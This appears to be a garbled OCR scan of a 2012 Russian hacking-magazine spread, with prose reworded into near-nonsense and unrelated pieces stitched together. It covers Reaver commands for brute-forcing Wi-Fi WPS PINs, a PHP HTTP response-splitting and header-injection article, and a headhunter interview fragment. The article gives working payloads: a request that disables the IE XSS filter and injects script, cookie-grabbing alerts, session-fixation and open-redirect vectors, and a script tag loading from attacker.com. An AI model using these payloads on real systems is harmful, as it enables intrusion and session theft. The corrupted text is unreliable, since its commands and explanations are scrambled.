МАС-адреса?

· --ignoгe-locks' или — или скачать последнюю

Почему близ плохом сигнале Reaveг

...

Возможно, твоя милость спуфишь МАС виртуально-

версию изо

работает плохо, добро бы оный но хакинг WEP

081

го интерфейса mопО, а сие корпеть

WP5.

проходит нормально?

безграмотный будет. Надо выделять отчество реального

n обыкновенно взламывание

интерфейса, например, wlaпO .

WEP происходит путем повторной пересылки перехваченных

081

Это происходит потому, зачем степень

r;t

получай времена воспрепятствовать исчерпание

0':'1 a.l

Почему мы безостановочно получаю ошибки

a.l

0VN.

mМожно ли одновр`еменно привести в действие два и сильнее экземпляров Reaveг про ускорения

атаки?

n

Теоретически МОЖНО, НО разве ОНИ будут

батман кетов, с намерением заразиться в большинстве случаев векторов

Reaveг однако момент посылает точке доступа

инициализации (IVI, необходимых ради

единственный равно оный но

успешного взлома . В этом случае неважно,

Проверь, активирован ли нате раутере

скоростьперебораедвалиувеличится,таккак

потерялея какой-либо пакет, либо недавно

WP5. Это

во данном случае симпатия ограничивается слабым

ПРОКАЧИВАЕМ В

PIN,

позволительно предпринять близ помощи ути-

вытверживать одну равным образом ту а точку доступа, ведь

REAVER

автор показали самый без затей да как никогда энциклопедичный

HOWTO

081

на нежели дело?

сноровка использования утилиты Reaveг. Однако совершение

WP5 у

разных

0. Некоторые точки доступа

могут не позволить

WPS возьми

определенное

сезон , заподозрив, ась? их пытаются поиметь. Reaveг эту ситуацию замечает

производителей отличается, почему на некоторы х случаях необходима

да делает паузу во переборе сверху

дополнительная настройка. Ниже ваш покорнейший слуга приведу дополнительные опции,

паузы дозволено менять:

015

секунд в области умолчанию, протяженность этой

которые могут повысить в должности стремительность да действенность перебора ключа.

# reaver -i

0. Можно вынуть душу боец

канала да

# reaver -i

00 : 01:02:03:04:05

0. mопВ

mопВ -Ь

00:01:02:03:04:05 --lock-delay=25B

0510 точки доступа: -с

01

-е liпksys

Некоторые реализации протокола

WPS

разрывают сцепление быть

неправильном РIN-коде, и так по части спецификации должны возвращать особое сообщение . Reaveг бессознательно распознает такую ситуацию, чтобы сего

0.

Благотворно сказывается сверху скорости брутфорса опция

·-- dh-small',

существует опция · --пасk' :

которая задает небольшое авторитет секретного ключа, тем самым облегчая

# reaver -i

подсчеты получи и распишись стороне точки доступа:

# reaver -i

mопВ -Ь

00:01:02:03:04:05 -vv --dh-small

0. Опция

mопВ -Ь

00:01:02:03:04:05

--пасk

' --eap-teгmiпate' предназначена про работы не без; теми АР, которые

требуют завершения WРS-сессии от через сведения ЕАР

0. Таймаут ожидания

необходимости его позволяется изменить:

# reaver -i

# reaver -i

0. Возникновение

mопВ

FAIL:

ответа сообразно умолчанию равен пяти секундам . При

00 : 01:02:03:04:05 -t 0

mопВ -Ь

00:01:02:03:04:05

--eap-termiпate

ошибок во WР5-сессии может означать, что-нибудь АР

ограничивает цифра попыток ввода РIN-кода, либо легко перегружена

0. Задержка

средь попытками до умолчанию равна одной секунде. Она

# reaver -i

ХАКЕР

mопВ -Ь

03 /158/ 00 02

00:01:02:03:04:05 -d

запросами . В этом случае Reaveг приостанавливает свою деятельность,

притом промежуток времени паузы может фигурировать задано со через опции

т акже может существовать настроена: В

# reaver -i

mопВ -Ь

·--fail-wait':

00:01:02:03:04:05 --fail-wait=360

023


COVERSTORY &lt;script&gt;alert(&quot;Recognize-Security &quot; +document .cookie ); &lt;/script&gt;&lt; !-- "></ head ><body></body></html >

DISCLAIMER

Вообще, на п роцессе аудита первоначально г об стих веб-приложений

получи РНР многократно попадаются конструкции вида

header( "Location: " .$_GET[ 'backto_url' ]) либо хоть header( "Location: / index. php?lang=".$_G ET[ 'lang' ]). Е сли первую покамест дозволяется классифициро­

ZeгoNights, а лишь только написана объединение его мотивам. Помимо материала,

вать хоть бы в духе уяз вимость класса О реп R ediгect, ведь вторая по-видимому

дальнейших исследований, посвященных филырации РНР­

бы не вдаваясь в подробности далеко не является уязвимостью . Опытный чтец заметит,

функций да механизмам работы браузеров не без;

чт что до тогда во явном виде наравне в один из дней таки да присутствует ба г подобно НТТР

доклада, касающаяся уязви мастей, связанных со заражением

Response Sp li tti ng, %0 d%0a

изложенного в эпоха доклада, во статью вот и все вошло оnисание .

cookies. Часть

кеш а, да smuggling-aтaк, короче изложена на расширенном виде

н по отношению всё мастерство на том, ч т что до современные версии

интерпретатора РНР [начиная не без; 0006-го года] фильтруют раздели­ тели

Эта параграф малограмотный является копией мой доклада возьми конференции

во следующих выпусках журнала.

да препятствуют проведению атаки. Вот сие равным образом лакомиться та

самая практическая предпосылка, которая заставила меня вчинить

углубленное освоение данной темы. Поэтом у предлагаю далеко не доверять

эти РНР

первому впечатлению что до фильтрации на функции headeг[] да разо­

которая предотвращает инвагинация заголовков равно защищает с атак

схватываться не без; проблемой глубже, ведь, бытийствовать может, т акую фильтрацию

в виде «расщепление ответа>>. Таким образом, начиная не без; на ерсии РНР

0.4.2

допускается обойти.

равным образом

0.4.2

0.1.2,

равно

0.1.2

во этой функции осуществляется фильтрация,

ввергнутый подальше шифр н е является уязвимым про атак

вроде <<в недр ение заголовков>> равным образом <<расщепление ответа>>:

ПРОТОКОЛ НТТР Обратимся ко переаисточнику [спецификации протокола НТТР] , что­ бы понять, какие символы могут предназначаться разделителями заголов­

заговор НТТР- ответа. П олный молитва спецификации доступен за адресу

Ьit .l y/ г9pLL , нас но интересует раздел

0 - Re sponse

c ?php header( "Location : / basic/ " .$_GET[ 'redirect ' ] . ".html" ); ?>

[ Ьi t .ly/BEAq4 ].

Общая фрейм НТТР- ответа имеет ниженазванный обличие :

В результате попытки проведения таких атак достаточно вызвана ошибка вроде Waгniпg, ориентировочно такая:

RFC-2616 Response=Status-Line; Section 0.1 * (( general-header; Section 0.5 1 response-header; Section 0.2 1 entity-header ) CRLF); Section 0.1 CRLF [ message-body ]; Section 0.2

Документация

test.php?xxx=bbb%0a%0dNew-Header:ЫaЬla

Warning: Header may not contain more than а single header, new line detected. in test.php оп line 0 Н в рассуждении ну далеко не будем враз навешивать ярлыки, а разберемся в проблеме крохотку глубже. Рассмотрим адрес интерпретатора, некоторый

Из приведенной ранее информации ясно, что-то разделителем заголо вк ов является серия

CRLF,

пользуется на относительно тд еления тела отве т а по части т блока заголовков . В кодированном виде

CR LF

выглядит во вкусе

выполняет фильтрацию разделителя :

которая да ис­

%0 D%0A.

URL-

Именно во таком

виде возлюбленная равным образом используется для того проведения классических атак как

«рас щепление запроса». Эти методы неплохо работали прежде тех пор, пока интерпретаторы безграмотный обзавелись функциями фильтрации

CRLF,

/* new line safety check */ char *s=header_line, * е=header_line + header_line_ len, * р; while (s < е && (р memchr(s, ' \n' , (е - s)))) { i f ( *(р + 0 )== ' 01 *( р + 0 )=='\t ' ) {

по части ко т орых немедленно равно пойдет речь.

0=

р

+ 0;

continue ; ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ

CRLF

В РНР

Ф ункци ваш покорнейший слуга headeг[] [ Ьit .l y/wVbbcd ] повсюду используется на РНР на

efree(header_line ); sapi_module.sapi_error(E_WARNING, "Header may not contain more than а single header, new line detected. "); return FAILURE;

передачи заголовков на НТТР -ответе сервера. Чаще просто-напросто ее при­

меняют в целях переадресации пользователей от одной страницы веб­ приложения в другую. Как видать изо документации, начиная не без; во ер-

Browser Single

Second Content-Length header

data

header

schema

splltter byte

ln Refresh header

Как видно, после этого осуществляе т ся осмотр нате наличность символа

LF

[в URL-кодированном виде выглядит вроде % Од] . Пр да обнаруже­

нии такого символа, задним числом которого овчинка выделки стоит нечто не считая табуля-

ции

[%09]

да пр обела

фильтруется н е

[%20], вызывается ошибка. Таким образом, CRLF, а только лишь LF-байт. Согласно RFC , кто пишущий сии строки

только что изучили, всё работае т безопасно. Н насчёт предл а гаю безвыгодный сда­ ваться что-то около бойко да разузнать у браузеров, соблюдаю т ли они

RFC

на точности? П ервым делом не запрещается проверить, как бы браузеры воспри­ нимают название со первым пробелом равно табуляцией. Для сего на­ пишем прос т ой РНР-скрипт равно проверим его по-под на семи браузерам равным образом :

Таблица тестирования браузеров получи и распишись один в поляна не воин разделитель, двоичный заrоловок длины и Refresh-зaroлoвoк

026

c?p hp header( "X-Test1:1 \ r \ n Set-cookie: is1=0K " ); header( "X -Test2 : 0\ r \ n\ tSet-cookie : is2=0K" ); echo "cscript >alert(document.cookie) </ script >" ; ?>

ХАКЕР

03/158/2012


Расщепляй равно властвуй

П олучается, исключительно lпtегпеt Е хрlогег понимае т куки на таких хидерах. Таким образом, всего-навсего прочитав

RFC

да просмо т скулеж

исходник равно РН Р равно три строки т естово г относительно кода, да мы из тобой ранее выяс н или, как бы

отшагать филырацию функции headeг[J для того

IE, да много значит рас­

ширили сторона применения большинства уязвимостей, которые

~

*

0

Веб

localhost:8080/php·smug/index2.php

Warning: Header may not contain more than \indexl.pbp on line 0

а

single header, oe\v line detected. in

'1

сначала классифи ц иро на алис ь т относительно л ько на правах О реп Rediгect. Н что касается небу­ дем выбирать возьми дости г нутом равно двинемся дальше. Впереди другие браузеf)Ы равно новые идеи.

Работа фильтра функции headeгll на РНР из 0006 лета вызываетта кую ошиб ко у

+ Д а, ч т ение последствие н ых кодов РНР равным образом рассуж д ение со точки зрения

здравой логики сейчас дало вместе с во ои п ло д ы. Мы нашли сnособ внедрения заголовков на браузера lпteгnet Е хрlогег. Пре д лагаю малограмотный останав­

*0

~

Веб

localhost8080/ php·smug/index2.php

Warning : Cookie names can not contain any ofthe foJlo,ving '=,; \t\r\n\013\014' in \indexl.pbp on line 0

'1

ливаться для достиг н у т ом равно n р по части д олжить начатое исс л едование, что­

бы подвергнуть проверке доби т ься того а равно пользу кого д ругих браузеров.

Итак, исходники Р Н Р будто в отношении филырации % 0а [\nили LFI.

Рабо та ф да льтр а фун для ци равным образом setcookiell по мнению первому аргумен ту

Предnоложим, что такое? сущес т вую т какие-то бай т ы, которые могут ~

служи т ь разок д елителями заго л овков чтобы браузеров. Д л мы nроверки этого предположения напишем азбучный фаззер да запустим его почти

различными браузерам и. Н аиболее важные куски заключение фаззера

*0

nри во е д ены внизу :

'1

#! / usr / bin / perl use str i ct ; use warni ng s; use Socket ;

Веб

loca lhost8080/ php·smug/ index2.php

Warning: Cookie values can not contain any ofthe foJlowing ',; \t\r\n\013\0 04' in \indexl.pbp on line 0

Работа фильтр а функци равным образом setcookiell по мнению второму аргументу

н улл-байт. Информацию об этой уязвимости автор этих строк отправил произво­

дителю. Ей был присвое н закидон 05992 равно ординар черта Low [это не позволило ми унаследовать мзда после ее обнаружение,

listen SERVER , 0е ; $an sw="НТТР/1.1 0ее OK\r\n" ; for ($ i=e ; $i <256;$i++ ){ $an sw.="Set-cookie: cook-$i=1" .c hr($i);

что, во общем, по заслугам - сие тогда живей ба г, нежели уязвимость!.

ту

В итоге на 05-й версии Хрома нул л-байт поуже поправи л и, а для моме нт у выхода этой статьи, подозреваю, актуальной склифосовский уж 07-я версия бра у зера. F i гefox но остается держи высоте, nоскольку реализован в этой части точный так, как бы описано на

$answ .="\r\n\r\n<h1>Test splitting bytes</h1>" ;

RFC. Следовательно,

ни нераздельно

с найденных нами способов обхода филыров Р Н Р интересах него рабо­ тать неграмотный будет. Фаззер адски простой: не без; его через да мы не без; тобой выясняем, может

ли какой-т что касается единодержавно байт [под ч ерки на аю, вот поэтому и есть исключительный байт,

РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ

XSS

а отнюдь не д ублет! служит ь раздели т елем заголовков во браузерах, равно как

Настало сезон обратиться найденными во фильтре ошибка­

CR LF [%0d%Dal. Д ля э т что касается г касательно держи сокетах nишем веб - микросервер,

ми равным образом nроэксnлуатировать уязвимости функции headeг[J, в таком случае глотать

ко т орый нате первый встречный НТТ Р-за п рос браузера дает что касается т вет, со д ержащий

обманывать безвыгодный посредственную атаку. Здесь на пороге нами встает

х идеры

Set-cookie,

разделенные каждым с

056

байт по мнению очереди.

Соот во етственно, кабы какой-то байт срабатывает как бы разделитель,

новая вопрос - самочки браузеры имеют замонтированный механизм защиты через расщепления ответа . Вот наравне мудрено по сути дела

поя во ляетс автор последний кукис, кабы но безграмотный срабатывает, так ко значению

в отдельных случаях выжимать пот не без; l iепt - sidе-уязвимости: попервоначалу борешь­

текущего кукисадописывается линия ви д а

ся не без; фильтрами держи серверной стороне, а дальше бьешься до этих пор равно из

<«N>Set-cookie :.. >> . За­

пускаем скрипт, заходим из через браузера, считаем количество проставленн ы х куки, смотрим, какие байты из р аботали, в рассуждении сего nро ­

клиентскими.

Итак, расщепывание отве т а глав н ым образом основано держи пере­

буем нижеуказанный браузер. П роцедура неграмотный куда у т омительная, приближенно

даче ложного заголовка Content-Leпgth, какой надо апострофировать кого

как бы на тестов ты да я берем всего лишь самые популярные браузеры, кото­

браузеру, сколь байтов содержится во теле НТТР-ответа. Однако

рых всего делов п мы т ь

:-1. Тем

неграмотный менее, рекоме нд ую т ебе самос т оятельно

п ри вызове headeг[J самопроизвольно Р НР отправляет по отношению д ан аншлаг Coпtent­

переменить фаззер хотя бы бы пользу кого автоматизации подсчета куки

Leпgth со значением О, ото сего никуда отнюдь не деться. Таким образом,

равно поиска разделителей [исходники фаззера ищи получай нашем диске!.

бесподобный НТТР Response Splitting [расщеnление НТТР-ответаl

Получаются вона такие равным образом н тересные резул ьтаты:

работает всего-навсего тогда, рано или поздно браузеры воспринимаю т дальнейший за­ головок

Content-Length

вроде действительно верный. Здесь равно начинаются

проблемы, затем что ни одинокий сегодняшний браузер таково неграмотный де­

0/9 %ed Fi r efo x 0 Oper a %ed Chrome %ed %ее ( Is s ue 05992 fi xed i n re l . 05) Safa r i %ed н

лает. Тем отнюдь не менее, позволительно nровести атаку интересах lnteгnet Е хрlогег, воспользовавшись т ем, в чем дело? данный браузер расnознает Н Т МL-код на от­ вете, инда безграмотный читая хидер

Content-Length.

Это больше нежели странное

nоведение имеет простор во браузере от 0-й до 0 - ю версию . П ишем уязвимый Р НР -сценарий:

Как видно, по сию пору браузеры, выключая F iгefox, воспринимают оди­ ночный

CR

т очно приблизительно же, что равно всю цепь

CR LF.

Вот э т касательно уж настоя щ ий резул ьтат, добро д аря ко т орому можно н е лишь только шея во да т ь уязвимость, же да свершить атаки возьми ее основе

<?php header( "X-Header: aaa" .$_GET ( 'r' ] ); ?>

реально кросс-браузернымиl Отмечу, что, при случае аз многогрешный начинал эти изо ы ска н ия, ак т уальной была 04-я модификация

Goog le C h гome,

дл мы

ко оторой опять же существовал другой байт-разделитеть -

Х АКЕР ОЗ/15 0/ 0 01 0

Затем n рово д им атаку nод l nteгnet Е хрlогег посре д ством вот такого НТ ТР -заnроса :

027


COVERSTORY обсудили. Еще единолично IЕ'шный заголовок, X-Content-Type-Options, ·

/index.php?r=foobar%ed<html>%ed<hl> TEST </h l >

предоставляю тебе покупать самостоятельно. Остальные заголов ­ ки к управления безопасностью поддерживаются всеми браузе­

Вывод сего от ход твоя милость сможешь разобрать бери соответствую­

щем скриншоте. На ранний взгляд, всё поуже хорошо. Однако нас

рам да . Однако запомни по образу аксиому следующее утверждение: заго ­

ловки перезаписываются [за исключением Content-Length). Таким

блокирует вделанный на браузер ХSS-фильтр, рано или поздно автор пробуем

образом, header( "Location:

ввести воттакой схема :

дает полноценную слабость Open Rediгect рядом эксплуатации

/index .php?r=foobar%ed<html>%ed<script > alert(/Splitting/)</script>

хотите- верьте, хотите- проверьте. Сейчас автор безвыгодный буду nеречислять

/index.php?lang=" .$_GET[ 'lang' ])

вектора ?lang=aaa % 0dlocation:http://yandex.гu. Как говорится, все возможные заголовки lпрочитать что до них твоя милость сможешь держи соответ­ ствующей врезке), а остановлюсь всего лишь нате самых значимых. Итак, Access-Contгoi-AIIow-Oгigin- сие после мяч овок, тот или иной

Пройти такого склада линия да никак не нажить желаемого результата, упер­ шись на какой-то после этого фильтр,- сие невыгодный для того нас. Вспоминаем, зачем наша сестра

работает nочти nод всеми браузерам и, вдобавок Орега, во часть числе

можем безграмотный всего лишь распоряжаться веточка ответа сервера, только равным образом насаждать

почти lnteгnet Ехрlогег 0+, Fiгefox 0.5+, Safaгi 0+ равным образом Google Chгome. Для

заголовки. К тому но ХSS - фильтр lпtегпеt Ехрlогег, вопреки получи так

основные положения советую составить себя представление вместе с первоисточником lmzl.la/4sгnwml.

сколько некто страшно прибавил во сигнатурах в соответствии с сравнению не без; 0-й версией

Как видно, таковой рубрика не запрещается утилизировать со дополнительными

браузера, всё где-то же, на правах равно раньше, отключается от через специ­

из-за шайба об на ка ми Access-Contгoi-AIIow- Methods,

ального заголовка X-XSS-Pгotectioп: О. Ну вот, завершающий кусочек пазла встал в место, равным образом в эту пору не грех осуществлять полноценную

Headeгs, Access-Contгoi-Max-Age равно некоторыми другими [снова обрати уважение для приведенную перед этим ссылку ). Назн аче ни е сих

атаку.

заголовков, думаю, несомненно изо их названий. Access-Contгoi - AIIow­

Финальный НТТР-запрос для уязвимому сценарию имеет следую­

Access - Contгoi-AIIow­

Oгigin не запрещается исnользовать что на усиления, эдак равным образом интересах ослабления безоnасности . Всё ремесло на том, ась? коли нынешний текстовка малограмотный содер ­

щий вид:

жится во ответе, пришедшем ото сервера, в таком случае вход после XHR ко со­

/index2 .php?r=foobar%edx-xss-Protection:e%ed<html>%ed <script >a lert( /xss/)</script>

держимому тела такого ответа запрещен. Таким образом, я можем внедрить наименование «Access-Contгoi-AI I ow-O гigin : •" равно nрочитать полный отказ со всеми конфиденциальными д анными.

ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ Мы начали не без; чтения RFC, поэтому заглянули вглубь РНР, впоследствии плав­

ОСМАТРИВАЕМСЯ

же перешли для изучению механизмов, применяемых браузерам да для того

Итак, ты да я нашли определенные уязвимости функции headeгll. На­

обработки ответа, да вот, наконец, получили важные результаты.

таким образом промежуток времени узнать, существуют ли какие-нибудь иные функции,

Мы разобрались от lntегпег Е хрlогег равно рассмотрели укоренение за­

выnолняющие аналогичную фильтрацию. Собственно, на РНР име­

головков на НТТР -о тв ет. Сам манера далеко не является частным случаем

ется общем три функции, которые занимаются в рассуждении тправ каковой заголов­

расщепления ответа, таково как бы возле его использовании появляется

ков: headeгll, setcookiell равно setгawcookiell. В результате недолгого

только лишь избыточный заголовок, а безвыгодный вторичное пикния ответа. А ежели наша сестра

изучения несомненно выясняется, что такое? двум последние функции, в такой мере но

отнюдь не внедряем интрузив ответа, так равным образом проблем из Conteпt-Length у нас равно как

как бы равно headeгll, уязвимы на аргументах $path равно $domain . Уязвимые

невыгодный будет, ведь, соответственно RFC, акт НТТР хоть твоя милость в чем дело? хочешь безвыгодный регулирует

доводы есть, же их модифицирование пользователем на Приложениях

часть заголовков . Теn ерь предлагаю nойти ужотко равно nристу­

встречаетс моя особа порядочно редко. Обычно ото nользовательских nара­

горькую ко изучению др угих потенциально внедряемых заголовков, тем

метров зависит исключительно отчество или — или зна чени е куки, так ни перед каким видом никак не владение

побольше сколько да мы вместе с тобой сызнова безграмотный выяснили, что вести атаку подо остальны­

равно безграмотный колея . Поэтому поиски нелишне удлинить . В имени и значениикукивыполняется несравнимо побольше строгая фильтрация,

ми браузерам и.

нежели на функции headeгll:

ВНЕДРЯЕМ ЗАГОЛОВКИ Как уж было отмече н насчёт выше, заголовки безграмотный влияют возьми Content-

Length, а значи т, их дозволительно насадить на НТТР- отповедь для того любых браузеров. В нынешнее момент существует н емало заголовков для управления безопасностью, единственный изо которых, X-XSS-Pгotection, управляющий встроенным ХSS-фильтром l nteгnet Ехрlогег, я уж

i f (name && strpbrk(name, "=,; \t\r\n\el3\el4" ) !=NULL) { !* man isspace for \ еlЗ and \ el4 */ zeпd_error( E_WARNING, "Cookie names сопение not coпtain any of the followiпg'=,; \\t\\r\\n\\el3\\el4' " );

ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 1. X-Frame-Options. Содержит оглавление доменов,

Coпteпt-Security-Policy : allow http://*:80.

идентификатор сессии, а а там просто-напросто

со которых текущий сайт может оказываться загружен

З.

подождать, ноне абонент авторизуется,

во ifгаmе/fгаmе-контейнер . Для проведения атаки не запрещается пустить в дело X-Frame-Optioпs : allow-fгom

attacker. 2. X-Content-Security-Policy.

Refresh . Старый душевный Refгesh . Дает внедрение HTML подле использовании dаtа­ схемы alias Open-гedirect : Refresh : 0,data:text/ html,<h1>0K</h1>. В таком содержимом Chгome

равным образом эксплуатировать настоящий аншлаг на вторичной

аутентификации. Вектор может выглядеть примерно следующим образом: foobaг :% 0d5et­

оглавление доменов, не без; которых можно

прогноз выполняется неграмотный во целевом домене ,

Cо в рассуждении k i е: Р Н Р5 Е 051 D=FA К Е D%0d Locat ion=/ auth.php. Разумеется, такая график довольно

погрузка содержимого . Скажем, разве сервер

а на пирушка самой data-c x eмe, сколько неграмотный позволяет

делать всего во томишко случае, разве веб­

устанавливает на ответе X-Content-Secuгity­

злоумышленнику обманывать

вставка задним числом авторизации никак не отправляет

Policy : allow 'self', в таком случае адрес <script src="http://at-

0. Set-cookie. Его мы привожу на этом месте

tackeг.com/1.js"><scгipt> подвизаться бери странице

до невероятия для того полноты. Используя

На практике

неграмотный будет. Таким образом, во значении интересах

оный заголовок, допускается поставить накануне

к 0ession Fixatioп !именно беспричинно называется

проведения атаки нельзя не обозначать Х-

оконченный lто поглощать именитый злоумышленнику!

буква атака!.

028

Содержит

фильтрует scгipt . Но, вроде бы вслед за тем ни было,

XSS.

пользователю свежеиспеченный идентификатор сессии .

09% РНР-приложений уязвимы

ХАКЕР

03/158/2012


Расщепляй равным образом властвуй

01[~ .tf] http://t~stcom:8080/php·smug/i ndexl.php?rsfoobar%0d <html > %0 Р

х

Find: j9

0

Conten t-Lenиth:

PI'N~ous Nежт.

0

0

..

С, Х ' ~ testcom

Options .. 0

0 Keep-Alive: timc:ou\-5, max"" IOO Connecrion: Keep-Ative Content-Type: textlhtml

TEST Content·Lengtb: 0 Keep-Alive: timeout=5, ma:-;;=1 00 Connectioп : Keep-Alive Content-Typc: textlhtml

IE распознает НТМL-содержимое хоть

до Coпteпt-Length, в таком случае убирать напрямую во заголовках

return FAILURE ; }

if ( !u rl_encode && value && strpbrk(value, ",; \t\r\n\013\814" ) !=NULL) { /* man isspace for \ 013 and \ 014 */ zend_error( E_WARNING, "Cookie values сопение not contain any of the following',; \\t\\r\\n\\813\\814'" ); return FAILURE;

0 lnternet

Eжplorer has mod ified this page to Mlp prevent cross·site кripting.

Срабатывание ХSS-фильтра на

IE

chrome 0896 safari 0891-LEN(cookie_name) opera 0896 firefox 0896 iexplore 0116- LEN (cookie_name) ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА Как всегда, выгодно отличается пофигачить со чтения

RFC: www.ietf.oгg/гfc!rfc2109.txt . RFC подобает убедить получай фразу << at least 20 cookies рег unique host ог domain name». Здесь невыгодный говорится четко, необходимо ли браузерам оберегать 00 кукинахост тож 00 Особое забота во этом

} Функция stгpbгkll возвращает ложь, ежели во первом аргументе присутствует пусть бы бы сам по мнению себе байт изо второго аргумента. Как видно,

куки возьми домен. Пусть самочки решают. Видимо, во 0997 - м г оду сие

процеживание именикукиотличается ото фильтрации значения всего только

казалось нормальным, хотя сейчас, эпизодически существую т нелюди

одним байтом- символом равенства. Прежде просто-напросто ми захотелось

из сотней поддоменов, сей задание больше нежели актуале н.

протестировать функцию фильтрации. Она является полным аналогом

Итак, когда-никогда моя персона прочитал текущий

RFC,

в таком случае принялся выискивать настройки,

!вернее, прототипом] РНР'шной stгpbгk l php.su/fuпctioпs/?stгpbrk ] ,

определяющие максимальное число ко у ки на брауэерах, да про­

которая оказалась небинарно совместимой . Казалось, зто победа,

верять, распространяются ли сии настройки в nоддомены . Вот который

однако малограмотный тут-то было! Дело на том, сколько самочки встроенная на РНР назначение

половая принадлежность у чилось:

передачи ответа с сервера такженебинарно совместима, в таком случае питаться

нулл-байт обрывает со тр оку наравне присест на книга месте, идеже автор могли бы провести сеяние заголовка либо тела отве т а. В итоге подсвечник у зер получает сделано укороченную за нулл-байту строку. Дальше был фаззинг, бог не обидел фаззинга . И никаких идей по части том, вроде отшагать

фильтрацию, даже если на старых версиях РНР символ=не обрезается.

Новые версии никак не содержатуязвимости lя проверил их постоянно от

chrome 088 safari -2888/ LEN (cookie_na me+cookie_va l) opera 08 firefox 049 iexplore 09

0010

годы ] .

Как видно, сии значения безвыгодный равны

00,

так ведь суще­

ственно в меньшей степени 00000 :-].Что касается поддоменов, так точка соприкосновения

ОСОБЕННОСТИ

COOKIES

числокукисохраняется только лишь к Орега равно Chгome, другие

Фаззин г ввек дает какой-то результат, пес со ним аж невыгодный нимало тот,

ведут отсчеткукиотдельно на каждого поддомена . Ситуация

получи кто рассчитываешь изначально. Эксперименты со фильтра­

забавная, поелику что такое? не запрещается свалить куки вышестоящего домена

цией среди первых двух аргументов setcookiell равным образом setгawc o okiell

вместе с нижнего уровня . А дозволительно ... Можно выведать имена куки выше­

равным образом принесли домашние плоды. Я выяснил забавные особенности об­

стоящего домена. РоС сего ба га на О ре га да Chгome фактиче­

работки куки во браузерах равным образом хочу оповестить об сих особенностях

ски представляет на лицо всеобщий скоуп в отношении гр аниченного числа куки.

во от т атье. Ведь уязвимости вторичны объединение сравнению не без; теми метода­

Что будет, нет-нет да и от вниз вместе с тоящего домена придет IN+1]-й кукис?

ми, вместе с через которых они были найдены. Как гласит китайская

Он перезапишет како й -токукис изо скоупа. Правильно, а ка-

народная мудрость, отдашь свою рыбу- накормишь товарища

кой? Самый старый? Нет, на фолиант равно быть кол, что-нибудь некто выберет кукис

получай день, научишь его расставлять ловушки рыбу- накормишь возьми всю живот .

по мнению кириллица у . Пахнет бинарным поиском? Да, вот поэтому и есть так! С по­

Но хва т ит лирики, перейдем из рук в руки ко результатам.

мощью этой прихоть ты да я можем выискивать именакукивышестоящего домена вместе с нижестоящего подо Орега равным образом Chгomel Н по отношению писат ь ко д подина

БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ

эту задачу несладко да далеко не особенно нужно, чай во реальной жизни

Если во качестве значения кукису послать сильнее символов, нежели

значения куки камо важнее, нежели их имена, которые, наравне правило,

поддерживает браузер, кукисне проставится. Я воспользовался

являются статическими. Итак, подведу итог. Оказывается, мож­

этой особенностью, нет-нет да и ми держи практике никуда не денешься было до­

хотя уменьшать куки, разве очищать допустимость вставить бессчётно

стараться того, с целью экий чисто адрес неграмотный ставил куки :

своих. Иногда к одного домена, от времени до времени в свою очередь ради п оддоменов

ICh гome, Орегаl.

<? php setcookie( "param8" , "PREFIX_" .$_GE T[ 'p8' ]);

leilii;Jel В добивание статьи пишущий эти строки бы хотел созвать тебя nродолжить мое

?>

изыскание равно зачать свое, сильнее современное равным образом интересное.

Для решения этой задачи нельзя не

0096

символов . Предпо­

Надеюсь, ми посчастливилось отобразить безграмотный всего лишь главное различных ба го на

лагается, ась? лишняя расстояние обрежется. Однако вполне весь

в виде НТТР

браузер ы не выделяя частностей никак не ставя т такие кукисыl Следовательно, даже если

ку да изучению. А если бы нет- обещаю выискать времена равно си лы , воеже

кукис уж существует, дьявол отнюдь не п ерезапишется. Это подходяще помогло подле

черкануть новые статьи чтобы журнала. На совершенно воnросы

написании сплойта перед слабость как Sessioп Fixatioп. Вот такие

равно никак не всего лишь не без; радостью отвечу во своем благе i oxod . гu ]. Сnасибо

цифры блокирующей длины значениякукиполучаются по-под

вслед за уважение равно вплоть до новых встречl :Х:

Response Splitting,

только равно воссоздать самоуправно путь для их п оис­

no

из т атье

разными браузерам и:

ХАКЕР

03/1 08/20 02

029


COVERSTORY

&ИОГРАФИЯ Окончиnафакультет

журналистики МГУ.

Работала редактором 01 главным редактором на раэnичных иэданиях. Участвовала на соэдании портаnа гabota.ru, вэявwего nремию Рунета.

запустила редакция PaбoтalaMa\\.Ru. Зкс-хантер Ma\\.Ru Gгoup.

Основатель агентства интернет­ рекрутмига PRUFFI. один иэ ведущих экспертов рынка хантинга во рунете.


Интервью из вед ущим хедх антером рунета

ИНТЕРВЬЮ С ВЕДУЩИМ

АЛЕНА ВЛАДИ М И РСКАЯ

ХЕДХАНТЕРОМ РУНЕТА

О РАБОТЕ ХАНТЕРА

fгiends). Каждый изо нас является носи­

Многие воспринимают хедхантеров вроде раз­

поперед

0,5

миллионов рублей на месяц.

телем информации об тех людях, со кото­

датчиков содержание на блокадном Ленинграде. Все

рыми работает. Именно вы, а невыгодный монарх тер

Раз во гетто я делаем домашние обзоры,

думают, ась? если бы знакомиться вместе с нами равным образом понимать вол­

сnособны nравильно поставить сих

идеже ставим реальные зарплаты (pгuffi.

шебный телефончик ведущего хантера на рунете,

людей. Вы работаете не без; ними произвольный

гu/analitika) . Цифры , которые наш брат nри­

в таком случае зто что дополн равным образом т ельная доля ка хлеба. Ты зна­

число равно согласно правилам можете сказать, который вкушать

водим, в

ешь продавщицу, да возлюбленная по-видимому в духе может подать

кто: вишь этому товарищу суммарно ни аза

тике ото известных рекрутинговых nро­

тебе внеочередной сухарик . Н по отношению возьми самом

запрещено nоручать, а вишь текущий достижимо

ектов. Почему? Объясню получай nримере .

деле никак не может. Боле е того, нет слов сезон блокады

пологий чувак.

00-40%

Мы знаем, который nрограм­

из-за зто расстреливали . Знание сего волшебного

телефона, по мнению сути, нисколько безвыгодный дает.

мист возьми

Хантер общепринято знает Но значительная технических

Буквально как-то у меня три дня невыгодный работала

сnециалистов - сыны Земли неnублич-

чинающий , эдак в качестве кого безотлагательно сие

счел меня каким-то

ные. Рекрутеру ужас хоть в гроб ложись накануне ни х добраться, в силу того что который они закрыты

того, по образу мы разместила объяв ление что до том, почто

в глубине комnаний. К nримеру, во мэрии

:1

В результате

работает

000

ление. Когда наша сестра видим вакансию

